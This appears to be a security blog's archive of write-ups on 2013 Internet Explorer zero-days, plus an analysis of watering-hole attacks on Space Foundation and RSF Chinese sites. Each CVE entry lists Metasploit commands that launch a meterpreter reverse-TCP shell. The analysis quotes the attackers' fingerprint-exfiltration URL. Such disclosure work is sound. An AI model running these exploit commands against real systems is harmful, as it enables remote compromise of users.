Tag Archives: IE 0Day

CVE-2013-3897 Microsoft Internet Explorer CDisplayPointer Use-After-Free

Timeline :

Vulnerability discovered exploited in the wild the 2013-09
Patched by the vendor via MS13-080 the 2013-10-08
Metasploit PoC provided the 2013-10-12

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2013-3897
MS13-080

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a “onpropertychange” event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called “onselect”. The “onselect” event will allow us to set up for the actual event handler we want to abuse – the “onpropertychange” event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in “onselect”, this will trigger “onpropertychange”. During “onpropertychange” event handling, a free of the CDisplayPointer object can be forced by using an “Unslect” (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer’s position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

Commands :

use exploit/windows/browser/ms13_080_cdisplaypointer
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3893 Microsoft Internet Explorer SetMouseCapture UAF

Timeline :

Vulnerability discovered exploited in the wild the 2013-08-23
Microsoft publish Microsoft Security Advisory 288750 the 2014-09-17
Microsoft publish a Fix it workaround the 2013-09-17
Metasploit PoC provided the 2013-09-30
Patched by the vendor via MS13-080 the 2013-10-08

PoC provided by :

Unknown
sinn3r
Rich Lundeen

Reference(s) :

CVE-2013-3893
MS13-080
MSA-2887505

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a use-after-free vulnerability that currents targets Internet Explorer 9 on Windows 7, but the flaw should exist in versions 6/7/8/9/10/11. It was initially found in the wild in Japan, but other regions such as English, Chinese, Korean, etc, were targeted as well. The vulnerability is due to how the mshtml!CDoc::SetMouseCapture function handles a reference during an event. An attacker first can setup two elements, where the second is the child of the first, and then setup a onlosecapture event handler for the parent element. The onlosecapture event seems to require two setCapture() calls to trigger, one for the parent element, one for the child. When the setCapture() call for the child element is called, it finally triggers the event, which allows the attacker to cause an arbitrary memory release using document.write(), which in particular frees up a 0x54-byte memory. The exact size of this memory may differ based on the version of IE. After the free, an invalid reference will still be kept and pass on to more functions, eventually this arrives in function MSHTML!CTreeNode::GetInterface, and causes a crash (or arbitrary code execution) when this function attempts to use this reference to call what appears to be a PrivateQueryInterface due to the offset (0x00). To mimic the same exploit found in the wild, this module will try to use the same DLL from Microsoft Office 2007 or 2010 to leverage the attack.

Commands :

use exploit/windows/browser/ie_setmousecapture_uaf
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3163 Microsoft Internet Explorer CAnchorElement UAF

Timeline :

Vulnerability discovered exploited in targeted attacks
Vulnerability reported to the vendor by Jose Antonio Vazquez Gonzalez via VeriSign iDefense Labs
Patched by the vendor the 2013-07-09
Metasploit PoC provided the 2013-09-09

PoC provided by :

Jose Antonio Vazquez Gonzalez
Orange Tsai
Peter Vreugdenhil
sinn3r

Reference(s) :

CVE-2013-3163
OSVDB-94981
MS13-055

Affected version(s) :

All versions of Internet Explorer 8 on Windows.

Tested on :

with Internet Explorer 8 on Windows 7 SP1

Description :

In IE8 standards mode, it’s possible to cause a use-after-free condition by first creating an illogical table tree, where a CPhraseElement comes after CTableRow, with the final node being a sub table element. When the CPhraseElement’s outer content is reset by using either outerText or outerHTML through an event handler, this triggers a free of its child element (in this case, a CAnchorElement, but some other objects apply too), but a reference is still kept in function SRunPointer::SpanQualifier. This function will then pass on the invalid reference to the next functions, eventually used in mshtml!CElement::Doc when it’s trying to make a call to the object’s SecurityContext virtual function at offset +0x70, which results a crash. An attacker can take advantage of this by first creating an CAnchorElement object, let it free, and then replace the freed memory with another fake object. Successfully doing so may allow arbitrary code execution under the context of the user. This bug is specific to Internet Explorer 8 only. It was originally discovered by Jose Antonio Vazquez Gonzalez and reported to iDefense, but was discovered again by Orange Tsai at Hitcon 2013.

Commands :

use exploit/windows/browser/ms13_055_canchor
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

sysinfo

Forgotten Watering Hole Attacks On Space Foundation and RSF Chinese

As I announced you on Twitter, this blog post will present targeted attacks who have start mid-September and wasn’t discussed or presented in public. These attacks have end around mid-October.

A web site “arpeggio8.com“, hosted on 205.186.179.195 in US, was compromised in order to be used in a watering hole attack against Space Foundation and RSF Chinese.

The Space Foundation is a nonprofit organization that supports the global space industry through information and education programs. It is a resource for the entire space community – industry, national security organizations, civil space agencies, private space companies and the military around the world. It also supports educators, students and journalists with information and education programs.

Reporters Without Borders (RWB) is a French-based international non-governmental organization that advocates freedom of the press and freedom of information. Reporters Without Borders is also known as RSF, and RSF Chinese is a dedicated web site for Chinese news in Chinese language.

The watering hole attack was done through different files and by a dedicated centralized backend named “Jsbug“.

Description of the watering hole attack

Space Foundation and RSF Chinese web sites had they’re code a malicious javascript inclusion calling “http://www.arpeggio8.com/count/count.php“.

SpaceFoundation-RSFChinese-CVE-2012-4969

count.php” script provide javascript content who check the presence of “popad” cookie and if the browser is Internet Explorer 6, 7 or 8. This script also load “count2.php” who is used for another purposes, we will discuss about this file later. If all the conditions are in place “rsf.php” file is loaded with parameter “id=1024“.

rsf.php” script only provide content if parameter “id=1024” is present. This script load through an iframe call “ie.html” file. “rsf.php” is the equivalent of “exploit.html” in the CVE-2012-4969 0day found in mid-September.

ie.html” file is the equivalent of “Protect.html” in the CVE-2012-4969 0day found in mid-September, but here no Flash file is involved to do the heap spray. “ie.html” file is containing a packed javascript code how will do the heap spray and trigger the vulnerability. Pastebin encoded version and decoded version.

The javascript is decoded though the “decode” function and the key “0xe1” for decoding is provided as argument to the function. The javascript “int_to_hex” function will check if Oracle Java 6 is present, if operating system is Windows 7 or XP and if Internet Explorer 9 is used. The script will also gather the browser language.

decode

If Windows XP is used, and language is “en-us“, “zh-cn“, “zh-tw“, “ko” or “ja” (hum hum CVE-2012-4792…), then the vulnerability is triggered.

If Windows 7 is used and Java 6 is installed, then the vulnerability is triggered. A spray base value is provided in the code for Internet Explorer 9 , but “count.php” has filter the targeted browsers.

Once the vulnerability is triggered, “917.exe” (6b4aa596e5a4208371942cdb0e04dfd9) file is installed. This malware is known as “Trojan-Dropper.Win32.Dapato.bscc“.

A interesting point regarding “ie.html” file, this file was dating of 19 September.

rsf-ie-cve-2012-4969

Some facts regarding CVE-2012-4969 :

  • Vulnerability was discovered exploited in the wild, with a Flash variant, the 14 September.
  • Metasploit PoC was provided the 17 September.
  • Microsoft Security Advisory MSA-2757760 was published the 17 September.
  • Microsoft patch was provided in MS12-063 the 21 September.

But you will see, through the next chapter, that the attack has began the 18 September.

“count2.php” script and Jsbug backend usage

count2.php” script is loaded in any cases for statistics purposes. This script will create and check two cookies “stat_cookie” and “stat_time“, gather version of Adobe Flash, presence of Oracle Java and HTTP referrer. All these informations are send back to the same script with parameters.

http://arpeggio8.com/count/count2.php?n=’+Math.random()+’&action=jpg&stat_refer=’+escape(location.href)+’&stat_flash=’+escape(flashVer)+’&stat_java=’+escape(stat_java)+’&stat_cookie=’+stat_cookie+’&stat_time=’+stat_time;

All these informations are stored in a backend named “Jsbug“. This backend is quiet simple, only three menus “Client statistics“, “Report” and “Create Exploit“. The backend doesn’t have any external css or images files, and is typically composed of minimum three PHP scripts.

jsbug-backend-typical-files

Login page of the backend is also quiet simplistic, no page title, no text in the page, and this logic of simplicity make it harder to discover through Google searches.

jsbug-backend-login-page

Client statistics” menu will direct you on a recap page, of all visitors who have load “count2.php“, with OS type, browser type and version, version of Adobe Flash, version of Oracle Java, IP address, HTTP referer, number of visits, first visite and last visite date.

In the case of the Space Foundation watering hole attack, the first date are beginning 18 September.

jsbug-space-foundation-start

In the case of RSF Chinese watering hole attack, the first date are beginning 19 September.

jsbug-rsf-chinese-start

These attacks have ended around mid-October.

Report” menu will direct you on a statistics page, of all visitors.

jsbug-backend-stats

Create Exploit” menu is a page how will help the attackers to generate they’re javascript inclusion code.

jsbug-backend-create-exploit